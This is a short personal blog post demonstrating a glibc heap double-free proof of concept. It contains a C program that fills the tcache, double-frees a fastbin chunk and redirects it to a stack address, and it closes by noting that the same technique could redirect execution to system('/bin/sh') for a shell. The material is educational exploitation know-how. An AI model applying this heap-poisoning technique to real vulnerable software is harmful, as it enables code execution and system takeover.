PoC double_free

Posted by l0tus on 2022-12-13
Estimated Reading Time 1 Minutes
Words 277 In Total
Viewed Times

Source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include<stdio.h>
#include<stdlib.h>

int main()
{
size_t * ptr[12];
for(int i=0;i<12;i++)
{
ptr[i]=malloc(0x30);
}
int a=10;
free(ptr[0]);
free(ptr[1]);
free(ptr[2]);
free(ptr[3]);
free(ptr[4]);
free(ptr[5]);
free(ptr[6]);
free(ptr[7]);
free(ptr[8]);
free(ptr[9]);
free(ptr[10]);
free(ptr[9]);

for(int i=0;i<7;i++)
{
ptr[i]=malloc(0x30);
}
ptr[7]=malloc(0x30);//9
*(ptr[7])=&a;
ptr[8]=malloc(0x30);//10
ptr[9]=malloc(0x30);//9
ptr[10]=malloc(0x30);
ptr[11]=malloc(0x30);
}

compile

test

debug

test
Plus -g ensures that we can see the source code
test
Check the bins when all the freeings done.
We can figure out that the first seven chunks were sent to the suitable place of tcache while the last were sent to fast bin.
And here we have made the double free. There formed a loop in fast bin.
test
Check the bins again when the fist seven chunks were malloced. We can see that the rest chunks in fast bin were then sent to tcache.
test
Check the bins when the 9th chunk had been freed and exploited, we made it point to an address on stack, successfully.
test
Done.

review

This can be a image of tcache after double free:
test
Both the upside and down can be correct.
test
After malloc again and redirect.

Here comes the vulnerability: if we double free and redirect the chunk to some dangerous function like system and set the parameter as “/bin/sh” then we got the shell.


如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !